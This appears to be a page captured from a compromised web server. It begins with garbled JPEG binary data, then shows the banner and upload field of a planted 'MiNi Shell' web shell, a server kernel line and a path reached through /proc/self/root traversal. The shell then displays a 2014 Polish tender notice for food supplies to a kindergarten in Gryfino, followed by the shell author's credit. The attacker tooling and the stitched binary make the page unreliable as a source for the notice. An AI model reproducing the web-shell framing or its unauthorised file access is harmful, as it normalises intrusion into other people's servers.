JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140709/148831-N-2014.html

<p class="kh_header"><b>Gryfino: Zakup i dostawa produktów spożywczych</b><br>
<b>Numer ogłoszenia: 148831 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka , ul. Krzywoustego 5, 74-100 Gryfino, woj. zachodniopomorskie, tel. 91 4162925, faks 91 4152182.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uszatkaprzedszkole.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa produktów spożywczych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa pieczywa/produktów zbożowych, nabiału, mleka i wyrobów mleczarskich, owoców i warzyw, produktów suchych, mięsa i wędlin, ryb, napojów, tłuszczy, mrożonek, jaj dla potrzeb Przedszkola Nr 2 im. Misia Uszatka w Gryfinie.

Zakres zamówienia: 
GRUPA I: PIECZYWO, ŚWIEŻE WYROBY PIEKARSKIE I CIASTKARSKIE  

1. Bułka tarta 0,5kg -  szt. 270 
2. Bułki świeże pszenne 0,09kg - szt.	2000
3. Chleb krojony na naturalnym zakwasie chlebowym 0,5kg - szt. 2200
4. Chleb słonecznikowy 0,4kg - szt. 800
5. Chleb staropolski 0,7 kg - szt. 420
6. Chleb 7 ziaren 0,4 - szt. 1800
7. Chleb żytni 0,7 kg - szt. 400
8. Chałka maślana 0,3kg - szt. 120
9. Rogal maślany 0,10kg - szt. 2000
10. Bułka razowa z ziarnami 0,08kg - szt. 4000
11. Kawiorka 0,3 kg - szt. 400
12. Drożdżówki 0,10kg - szt.	750

GRUPA II: nabiał, mleko i wyroby mleczarskie
1. Kefir augustowski 0,4l - szt. 500
2. Jogurt naturalny zott 0,37l lub równoważny - szt. 2500
3. Mleko świeże 1l	litr - 9000
4. Ser żółty Gouda - Morski lub równoważny - kg 100
5. Serek homogenizowany Danio waniliowy 0,16 lub równoważny - szt. 5000
6. Śmietana łaciata 0,5l, 12% lub równoważna - szt. 200
7. Śmietana łaciata 0,5l, 18% lub równoważna - szt. 800
8. Śmietana wiejska 12% -0,4l - szt. 320
9. Twaróg półtłusty 0,20kg - kg 35
10. Twaróg śmietankowy 0,25kg - kg	450
11. Serek Bakuś ok. 0,15kg lub równoważny - szt. 200
12. Deser sojowy waniliowy 0,125kg - szt. 180
13. Ser żółty w plastrach Gouda 1kg lub równoważny - szt. 100
14. Serek Bakuś kieszonka wanilia, truskawka lub równoważny - szt.100
15. Serek Bieluch naturalny 150g lub równoważny - szt.	300

Grupa III: owoce i warzywa
1. Arbuz	- kg 200
2. Banan	- kg 1500
3. Brzoskwinia - kg	75
4. Cytryna - kg 100
5. Borówka amerykańska 0,25 kg - szt. 120
6. Ananas świeży - szt.  20
7. Maliny 0,25 kg - szt.  120
8. Grejpfrut czerwony - kg	50
9. Jagody	 - kg 30
10. Jabłka - kg 2500
11. Kiwi	- szt. 1200
12. Truskawki świeże - kg 120
13. Mandarynka - kg 400
14. Śliwka sezonowa - kg 20
15. Morela - kg 40
16. Pomarańcza - kg 1000
17. Nektaryna - kg	300
18. Gruszka - kg	500
19. Winogrono - kg	100
WARZYWA
1. Burak czerwony	- kg 1100
2. Cebula	- kg 340
3. Botwina - pęczek 40
4. Brukselka - kg	5
5. Czosnek - szt.	60
6. Imbir świeży - kg 2
7. Kapusta biała - kg 60
8. Kapusta młoda -	kg 40
9. Kapusta pekińska - kg 350
10. Kapusta czerwona - kg	140
11. Kapusta kiszona - kg 380
12. Koper zielony - pęczek 750
13. Kalarepa - szt.	50
14. Kalafior świeży	- szt. 200
15. Ogórek świeży - kg 400
16. Kapusta włoska - szt. 20
17. Marchew - kg 2000
18. Marchew młoda pęczek	- szt. 100
19. Natka pietruszki pęczek - pęczek 1100
20. Ogórek kiszony	- kg 320
21. Szczaw - pęczek 30
22. Papryka świeża	- kg 120
23. Cukinia - kg 10
24. Por - kg 130
25. Pietruszka - kg	400
26. Pomidor świeży - kg 500
27. Rzodkiewka - pęczek 650
28. Rzodkiew biała - kg 80
29. Seler	- kg 550
30. Szczypior - pęczek 650
31. Sałata zielona lodowa -	szt. 280
32. Salata masłowa - szt.	80
33. Ziemniaki - kg	11500
34. Ziemniaki czerwone - kg	1200
35. Ziemniaki młode - kg 800
36. Szarlotka jabłka - szt.	70
37. Bazylia świeża doniczka - szt. 20
38. Kiełki brokuła 0,25 kg - szt.	25
39. Kiełki rzodkiewki 0,25 kg	- szt. 25
40. Ogórek małosolny - kg	40
41. Fasolka szparagowa - kg	20

Grupa IV - produkty suche

1. Chrupki kukurydziane 0,07kg - szt.	1000
2. Makaron nitka cięta Lubella 0,5kg lub równoważny - szt. 600
3. Makaron muszelka drobna Lubella 0,4 kg lub równoważny - szt.	400
4. Zacierka Goliard 0,25kg lub równoważna - szt. 160
5. Makaron świderki Lubella 0,5kg lub równoważny - szt.	250
6. Makaron nitka rosołowa Goliard 0,25kg lub równoważny - szt.	200
7. Makaron wielozbożowy razowy Lubella 0,4 kg lub równoważny - szt. 60
8. Makaron kokardki Lubella 0,4kg lub równoważny - szt.	40
9. Płatki jęczmienne 0,4kg - szt. 70
10. Kasza pęczak 1kg - kg	150
11. Płatki ryżowe 0,4kg - szt. 50
12. Płatki kukurydziane Nestle 0,5kg lub równoważne - szt. 280
13. Płatki owsiane 0,4kg - szt. 30
14. Kasza kukurydziana 0,4kg - szt. 40
15. Kasza manna 1kg - kg 80
16. Kasza jęczmienna 1kg - kg 40
17. Kasza jęczmienna saszetki 0,4kg - szt. 150
18. Kasza gryczana saszetki 0,4kg- szt. 280
19. Kasza jaglana 0,4kg - szt. 150
20. Mąka pszenna Basia 1kg lub równoważna - kg 420
21. Mąka razowa Basia 1 kg lub równoważna - kg 20
22. Mąka ziemniaczana 1 kg	- kg 15
23. Mąka orkiszowa 1kg - kg	10
24. Kasza kus-kus 0,4 kg - szt. 200
25. Cukier 1kg - kg	1200
26. Cukier puder 0,5kg - szt.	6
27. Cukier waniliowy 0,016kg - szt.	550
28. Barszcz biały Winiary 0,066kg lub równoważny - szt.	500
29. Bazylia Kamis 0,010kg lub równoważna - szt. 20
30. Herbatniki be be 0,016kg lub równoważne - szt. 2000
31. Biszkopty petit 0,12kg lub równoważne - szt. 250
32. Brzoskwinia puszka 2,6 kg - szt.	12
33. Brzoskwinia puszka 0,560 kg - szt.	140
34. Deser Bobovita 0,190kg lub równoważny - szt. 800
35. Deser Gerber 0,125kg lub równoważny - szt. 50
36. Dynia łuskana 100g - szt. 160
37. Dżem Łowicz 100% owoców 0,28kg lub równoważny	- szt.	240
38. Herbata Saga 90T 0,126kg lub równoważna	- szt.	100
39. Herbata owocowa Herbapol torebki 25T lub równoważna - szt.	300
40. Herbata Rooibos 25 torebek 0,037kg lub równoważna	- szt.	30
41. Herbatka Bobovita 200g lub równoważna - szt. 15
42. Kakao Decamoreno 150g lub równoważne - szt. 90
43. Kawa Inka 150g lub równoważna	- szt. 150
44. Kisiel cytrynowy Winiary z cukr 0,077kg lub równoważny - szt.	1800
45. Koncentrat pomidorowy 30% 1kg Pudliszki kolor żywo czerwony lub równoważny - szt.	160
46. Koncentrat pomidorowy 30% 200g Pudliszki kolor żywo czerwony lub równoważny - szt.	60
47. Kukurydza puszka Bonduelle złocista 400g lub równoważna - szt. 180
48. Kwasek cytrynowy 0,020kg - szt.	140
49. Liść laurowy Appetita 0,06kg lub równoważny -szt.	20
50. Lubisie herbatniki 0,03kg lub równoważne - szt. 1000
51. Majeranek Appetita 0,08kg lub równoważny	- szt.	40
52. Majonez Rzymski 1kg lub równoważny - szt.	45
53. Herbata miętowa Herbapol T25 lub równoważna - szt.	30
54. Miód prawdziwy wielokwiatowy 400g - szt.	160
55. Morela suszona bezsiarkowa BIOEDEN 1kg lub równoważna - szt. 5
56. Oregano Kamis 0,010kg lub równoważne - szt. 20
57. Orzechy laskowe 100g - szt. 20
58. Papryka słodka mielona kolor żywo czerwony Appetita  0,010kg lub równoważna - szt.	300
59. Pieprz mielony Kamis 0,010kg lub równoważny - szt.	200
60. Pieprz cytrynowy Kamis 0,020kg lub równoważna - szt. 40
61. Rodzynki Bakaland 200g lub równoważne - szt. 200
62. Ryż Sonko 1kg lub równoważny - kg 100
63. Ryż saszetki Sonko 0,4kg lub równoważny - szt. 280
64. Sezam 1kg - kg 8
65. Sezamki 0,03kg - szt.	500
66. Słonecznik łuskany 100g - szt.	250
67. Soczewica czerwona - kg	10
68. Sól 1kg - kg	200
69. Tymianek Appetita 0,010kg lub równoważny	- szt.	15
70. Wafle ryżowe Sonko 120g lub równoważne - szt. 600
71. Ziele angielskie Appetita 0,015kg lub równoważne - szt. 20
72. Zioła prowansalskie Kamis 0,010kg lub równoważne - szt. 15
73. Żurawina suszona  - kg	60
74. Żurek butelka 0,5l	szt.	80
75. Żurek Winiary 0,066kg lub równoważny - szt. 100
76. Pasztet Profi firmowy 130g lub równoważny	- szt.	1300
77. Fasola sucha łuskana -	kg 20
78. Groch suchy łuskany - kg 50
79. Ciecierzyca - 	kg	10
80. Groszek konserwowy Pudliszki 400g lub równoważny	- szt. 150
81. Fasola czerwona 400 g - szt. 50
82. Pomidory całe bez skóry w puszce 400g - szt. 50
83. Chrzan w słoiczku Fructus 270g lub równoważny - szt.	12
84. Przyprawa Lubczyk suszony 0,03	- szt. 40
85. Curry 0,03 - szt. 10
86. Ananas w puszce 2,6 kg	- szt. 20
87. Wafle Grześki bez czekolady Goplana 28 g lub równoważne - szt. 500
88. Ananas w puszce 0,32  kg - szt.	50
89. Śliwka kalifornijska suszona 0,25 kg - szt.	50
90. Herbata z dzikiej róży Herbapol 25 T lub równoważna	- szt. 20
91. Krem czekoladowy Nutella 350 g lub równoważny - szt. 15
92. Koncentrat buraczany Krakus 0,3 l lub równoważny - szt. 10
93. Popping amarantusowy - preparowane ziarna amarantusa 100 g - szt.	45
94. Herbata z melisy Herbapol 25T lub równoważna - szt.	20
95. Powidła śliwkowe bez konserwantów Materne 0,29 lub równoważne - szt.	45
96. Kaszka mleczna Bobovita lub równoważna	- szt.	50
97. Kleik ryżowy - szt. 3
98. Jajko niespodzianka - szt. 50
99. Haribo żelki misie lub równoważne	- szt. 50
100 Lizaki Nimm2 lub równoważne - szt. 100
101 Cukierki Zozole lub równoważne - 	kg 4
102 Ryż brązowy saszetki Sonko 0,4 kg lub równoważny	- szt. 100
103 Wafle zbożowo ryżowe Sunny Corn bez konserwantów, naturalne opakowanie 12 szt. lub równoważne - szt. 650
104 Ogórek konserwowy 0,9 l - szt.	30
105 Guma rozpuszczalna Mamba opakowanie po 5 szt. lub równoważne - szt. 300
106 Galaretka owocowa bez konserwantów, z naturalnymi barwnikami, torebka 75 g - szt. 120
107 Snacki popcornowe Popcool Delicate niesolone 0,06 kg lub równoważne - szt. 200
108 Paluszki orkiszowe 120g	- szt. 80
109 Ketchup z przetartych pomidorów KROKUS  bez konserwantów 200 ml lub równoważny - szt.	200

Grupa V - mięso i wędliny

1. Łopatka b/k - kg	980
2. Szynka b/k - kg	200
3. Schab b/k - kg	500
4. Kurczak - kg 250
5. Filet z kurczaka bez skóry	 - kg	500
6. Korpus  - kg 750
7. Filet z indyka - kg150
8. Pałki drobiowe - kg 300
9. Kiełbasa Krakowska drobiowa  gruborozdrobniona, wędzona, pieczona lub równoważna - kg	80
10. Kurczak gotowany/wędlina 85% fileta z kurczaka - kg	30
11. Kiełbasa podwawelska średniorozdrobniona lub równoważna - kg 15
12. Parówki cielęce	- kg 400
13. Szynka delikatesowa z kurcząt o zawartości 89% mięsa z piersi kurcząt - kg 60
14. Szynka z wędzarni o zawartości min. 75% mięsa wieprzowego	- kg 60
15. Szynka łezka o zawartości min. 75% mięsa wieprzowego - kg	60
16. Kiełbasa śląska ekstra, średniorozdrobniona, parzona lub równoważna - kg 40
17. Kaszanka z wątróbką - kg 10

Grupa VI - ryby
1. Dorsz atlantycki bez skóry	- kg 220
2. Filet z łososia świeżego - kg 45
3. Makrela wędzona - kg 180
4. Morszczuk filet b/skóry - kg 280
5. Miruna ze skórą filet - kg	400

Grupa VII - napoje
1. Woda Żywiec N/G 1,5L lub równoważna - szt.	1000
2. Woda Żywiec dziubek 0,33L lub równoważna	- szt. 1000
3. Sok multiwitamina Tymbark  1l  lub równoważny - szt.	300
4. Sok Bobofrut 300ml lub równoważny - szt.	500
5. Soczki Leon Hortex 200ml lub równoważne - szt. 2500
6. Syrop Herbapol 420ml lub równoważny - szt.	20

Grupa VIII - tłuszcze
1. Olej kujawski 1L lub równoważny - szt. 450
2. Oliwa z oliwek extra vergine  0,5L - szt. 40
3. Masło Extra 200g - szt.	2800

Grupa IX - mrożonki
1. Brokuł Hortex 2,5kg lub równoważny - kg	180
2. Brukselka 2,5kg	- kg	14
3. Bukiet warzyw (brokuł, marchew, kalafior) 2,5kg - kg	100
4 Dynia kostka 2,5 kg - kg	25
5. Fasolka szparagowa cięta żółta 2,5kg - kg	60
6. Fasolka szparagowa cięta zielona 2,5kg - kg	200
7. Groszek zielony 2,5 kg - kg 50
8. Kalafior 2,5kg - kg 130
9. Malina 2,5kg - kg 180
10. Truskawka 2,5kg - kg	500
11. Marchew z groszkiem 2,5kg - kg	30
12. Marchew kostka 2,5kg - kg 60
13. Mieszanka kompotowa z  czarną porzeczką 2,5kg - kg	450
14. Mieszanka kompotowa bez śliwki 2,5kg - kg	200
15. Czarna porzeczka 2,5kg	- kg 320
16. Wiśnia bez pestki 2,5kg	- kg 60
17. Włoszczyzna paski 2,5kg	- kg 20
18. Lody Big Milk 100 g lub równoważne - szt.	325
19. Lody wodne Pirulo arbuzowe 73 ml lub równoważne	- szt.	20

Grupa X - jaja
1. Jaja kurze rozmiar L - szt.	10000.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.81.10.00-9, 15.33.11.70-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstąpił od opisania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Strony dopuszczają możliwość
1) zmian redakcyjnych umowy, tj.: poprawienie numeracji artykułów, paragrafów, odesłań
2) zmian będących następstwem sukcesji uniwersalnej albo przejęcia z mocy prawa pełni praw i obowiązków dotyczących którejkolwiek ze Stron,
3) zmian danych Stron ujawnionych w rejestrach publicznych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://uszatkaprzedszkole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka w Gryfinie, 
ul. Krzywoustego 5, 74-100 Gryfino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.07.2014 godzina 09:00, miejsce: Gmina Gryfino - Przedszkole Nr 2, im. Misia Uszatka w Gryfinie,
ul. Krzywoustego 5, 74-100 Gryfino.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pn. Jak dobrze być Przedszkolakiem! Współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, nr umowy: UDA-POKL.09.01.01-32-039/12-00.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com